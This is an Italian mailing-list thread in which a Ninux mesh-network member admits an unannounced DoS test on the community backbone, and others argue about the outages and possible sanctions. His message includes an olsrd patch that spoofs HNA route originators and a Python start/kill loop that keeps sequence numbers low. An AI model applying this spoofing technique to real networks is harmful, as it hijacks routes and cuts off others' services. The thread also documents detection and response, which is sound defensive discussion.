[Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

Andrea Pescetelli andrea.pescetelli a gmail.com
Dom 25 Maggio 2014 13:42:46 CEST 

Stai sbagliando perche' la macchina 172.16.40.40 esisteva
Per cessare l'attacco e' stata passata a 172.16.40.43 avvisando i
propietari preventivamente.
Quindi essendo male informato anche le tue conclusioni restano affrettate.

Penso di aver concluso.
Il 25/mag/2014 13:32 "Alessandro (aka ArkaNet)" <arkantiko a gmail.com> ha
scritto:

> Perdona(te) il replay ma è doveroso...
>
> 1) che si approvi o meno, la farm è la meta che si prefiggerebbe chiunque
> in un 'attacco' simile
> 2) i servizi sono come il miele per api ed orsi, ergo vedi 1)
> 3) avrei scelto anche io l'indirizzo di una macchina ancora non esistente
> né sul mapserver né sul wiki
>
> Detto ciò non avere fretta di sentirti tu il diretto interessato
> dell'attacco, solo perché tu hosti la farm, è la rete che deve *imparare* a
> difendersi e come vedi abbiamo imparato anche un'altra cosa, ovvero che se
> un servizio è centralizzato è più semplice da identificare ed attaccare
>
> Quindi, sì Buona Domenica ;)
>
> *--
> Arka*
>
>
>
> Il giorno 25 maggio 2014 12:27, Andrea Pescetelli <
> andrea.pescetelli a gmail.com> ha scritto:
>
>> Non è sminuendo la cosa che si risolve il problema.
>> Dove andare a colpire in un azione premeditata?
>> I servizi di tutti perchè ZioProto se ne frega della chat dove gli altri
>> fanno gsoc e scambiano opinioni.
>> Dove? Nella Farm che lui stesso non approva e guarda caso dove ci sta
>> anche casa mia dove forse per qualche motivo in un futuro avrebbe potuto
>> girarci anche il blog che gyardacaso non approva.
>> Quale subnet? La pubbica della farm e perchè non quella dove ci sta anche
>> il mail server di Nino?
>> Quale target? Una macchina guarda caso di casa al mare di Pierluigi che
>> abbiamo sostituito giovedi' insieme ad altre 3 perchè seccate da un fulmine
>> quindo oltre al culo per sistemare pura la presa per il culo a fare la
>> caccia alle streghe di un danno provocato senza avviso.
>>
>> No grazie se devo bestemmiare allora bestemmio e questo non è relax ma
>> danno provocato e torno a ripetere che un provvedimento simbolico va preso.
>> Non mi curo che sia ZioProto o qualsiasi altro ma che sia di esempio.
>>
>> Se per voi questa è ninux allora non utilizzate i servizi che non
>> approvate e fate un passo indietro.
>>
>>
>>
>>
>> Il giorno 25 maggio 2014 12:16, Alessandro (aka ArkaNet) <
>> arkantiko a gmail.com> ha scritto:
>>
>> Hola!
>>>
>>> Fish hai ragione dobbiamo fare qualcosa!!
>>> Sicuramente ZioProTo ci sta facendo capire quanto sia semplice per un
>>> macellaio utilizzare un coltello.
>>> Cosa dovremmo aver acquisito alla luce di ciò?
>>> Che se arrivasse un assassino e si impadronisse del coltello, farebbe
>>> una strage!
>>>
>>> Ora, senza troppe metafore, ci siamo resi conto che se qualcuno ha
>>> voglia (e capacità) può farci male.
>>>  I provvedimenti dobbiamo prenderli per evitare minacce *esterne*, e che
>>> sicuramente non avvisino prima di agire!
>>> Dire che Saverio sia una minaccia sarebbe come entrare in chiesa e
>>> bestemmiare, insomma ... non si fa ;)
>>>
>>> Se vogliamo una rete 'pronta' e con una certa resilienza, dobbiamo
>>> costruircela. A volte non basta fare il link migliore per poter dire di
>>> avere una struttura solida.
>>> Abbiamo anche bisogno di un motore che spinga!
>>>
>>> E poi ricordiamoci che ninux fa rima con relax!
>>>
>>> Io direi "fortuna che era un'azione controllata!" (e fatta apposta per
>>> essere controllabile)
>>>
>>> Bella && Buona Domenica @tutti
>>>
>>> *--
>>> Arka*
>>>
>>>
>>>
>>> Il giorno 25 maggio 2014 09:37, Andrea Pescetelli <
>>> andrea.pescetelli a gmail.com> ha scritto:
>>>
>>> Ciao
>>>> Vorrei chiedere di prendere provvedimenti seri a seguito di questi
>>>> eventi e comportamenti che da una settimana stanno invalidando sia il
>>>> rispetto reciproco sia il buon finzionamento della rete stessa da parte di
>>>> Saverio Proto.
>>>> Il 25/mag/2014 09:07 "Alessandro Gnagni" <alessandro a gnagni.it> ha
>>>> scritto:
>>>>
>>>>>  Non è qualche ora. Va avanti da giovedì mattina.
>>>>> Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...
>>>>> Jabber è stato ko da giovedì per sta cosa.
>>>>> Il 25/mag/2014 01:03 "Saverio Proto" <zioproto a gmail.com> ha scritto:
>>>>>
>>>>>> Ciao,
>>>>>>
>>>>>> Metto in Cc: anche wireless a ml.ninux.org perché questa email contiene
>>>>>> informazioni tecniche interessanti.
>>>>>>
>>>>>> bravi, avete risolto il problema in fretta :) Ho volutamente provato
>>>>>> un attacco DoS sul backbone per capire che effetto poteva avere.
>>>>>>
>>>>>> ecco la patch di olsrd con cui generavo l'attacco DoS
>>>>>>
>>>>>> diff --git a/src/build_msg.c b/src/build_msg.c
>>>>>> index 109f955..e252981 100644
>>>>>> --- a/src/build_msg.c
>>>>>> +++ b/src/build_msg.c
>>>>>> @@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)
>>>>>>    m = (union olsr_message *)msg_buffer;
>>>>>>
>>>>>>    /* Fill header */
>>>>>> -  m->v4.originator = olsr_cnf->main_addr.v4.s_addr;
>>>>>> +  struct in_addr fakesource;
>>>>>> +  fakesource.s_addr = 0;
>>>>>> +  //inet_hton(2956867021,&fakesource);
>>>>>> +  inet_aton("172.16.40.40",&fakesource);
>>>>>> +  m->v4.originator = fakesource.s_addr;
>>>>>>    m->v4.hopcnt = 0;
>>>>>>    m->v4.ttl = MAX_TTL;
>>>>>>    m->v4.olsr_msgtype = HNA_MESSAGE;
>>>>>>
>>>>>>
>>>>>> una domanda,
>>>>>>
>>>>>> se avessi patchato anche:
>>>>>>
>>>>>> m->v4.hopcnt = XXX
>>>>>>
>>>>>> mettendo numeri casuali..
>>>>>>
>>>>>> sarebbe stato altrettanto facile capire chi è che iniettava questi
>>>>>> messaggi ?
>>>>>>
>>>>>> mi sto divertendo parecchio con questi attacchi DoS, sono molto
>>>>>> istruttivi. Per chi vuole giocare insieme a me a programmare in C
>>>>>> possiamo approfondire il giovedi sera al Sans Papiers. (Il prossimo
>>>>>> che vorrei provare è DrDoS su snmp).
>>>>>>
>>>>>> un problema di questo attacco sono cmq i sequence number. Per rendere
>>>>>> l'attacco efficace ho dovuto far andare la mia instanza patchata di
>>>>>> OLSR a singhiozzo:
>>>>>>
>>>>>> import os
>>>>>> import time
>>>>>>
>>>>>> while True:
>>>>>>         os.system("olsrd")
>>>>>>         print "started\n"
>>>>>>         time.sleep(120)
>>>>>>         os.system("killall olsrd")
>>>>>>         print "killed\n"
>>>>>>         time.sleep(300)
>>>>>>
>>>>>> in quanto avevo bisogno che i miei sequence number dovevano sempre
>>>>>> essere piu bassi di quelli del spoofato, altrimenti venivano scartati
>>>>>> come out of sequence.
>>>>>>
>>>>>> vi va di scrivere insieme un articoletto per il blog ? Io scrivo la
>>>>>> parte di come ti costruisce l'attacco e voi la parte di come avete
>>>>>> fatto ad identificare il nodo spoofato ?
>>>>>>
>>>>>> ho staccatto il nodo attaccante, il gioco è finito :)
>>>>>>
>>>>>> ah... vi prego nessun malumore per qualche oretta di disservizi, this
>>>>>> is Ninux. Si fanno queste cose perché ci si diverte insieme.
>>>>>>
>>>>>> ciao :)
>>>>>>
>>>>>> Saverio
>>>>>>
>>>>>> Il 24 maggio 2014 23:23, Andrea Pescetelli
>>>>>> <andrea.pescetelli a gmail.com> ha scritto:
>>>>>> > Saverio,
>>>>>> > Abbiamo rilevato che dal nodo Gallia viene generato un messaggio
>>>>>> olsr hna
>>>>>> > con originator 172.16.40.40, validity time 570, hna
>>>>>> 176.62.53.192/28
>>>>>> > proveniente dal nodo in oggetto.
>>>>>> >
>>>>>> > Questo problema sta oscurando diversi servizi di ninux in farm
>>>>>> appartenenti
>>>>>> > a quella subnet.
>>>>>> >
>>>>>> > Abbiamo triangolato la posizione basandoci sugli hop count dei
>>>>>> cammini
>>>>>> > multipli.
>>>>>> > puoi verificare?
>>>>>> >
>>>>>> > Grazie
>>>>>> >
>>>>>> > Fish, Hispanico, Halino
>>>>>> > --
>>>>>> > Andrea Pescetelli aka Fish
>>>>>> > Skype: andrea5742
>>>>>> > Ninux int: 5001/5002
>>>>>> > Mobile: +39 3891156050
>>>>>> >
>>>>>> >
>>>>>> >
>>>>>> >
>>>>>>
>>>>>
>>>>> _______________________________________________
>>>>> Wireless mailing list
>>>>> Wireless a ml.ninux.org
>>>>> http://ml.ninux.org/mailman/listinfo/wireless
>>>>>
>>>>>
>>>
>>
>>
>> --
>> Andrea Pescetelli aka Fish
>> Skype: andrea5742
>> Ninux int: 5001/5002
>> Mobile: +39 3891156050
>>
>>
>>
>>
>>
>> _______________________________________________
>> Wireless mailing list
>> Wireless a ml.ninux.org
>> http://ml.ninux.org/mailman/listinfo/wireless
>>
>>
>
-------------- parte successiva --------------
Un allegato HTML è stato rimosso...
URL: <http://ml.ninux.org/pipermail/wireless/attachments/20140525/5e168bd2/attachment-0001.html>

Maggiori informazioni sulla lista Wireless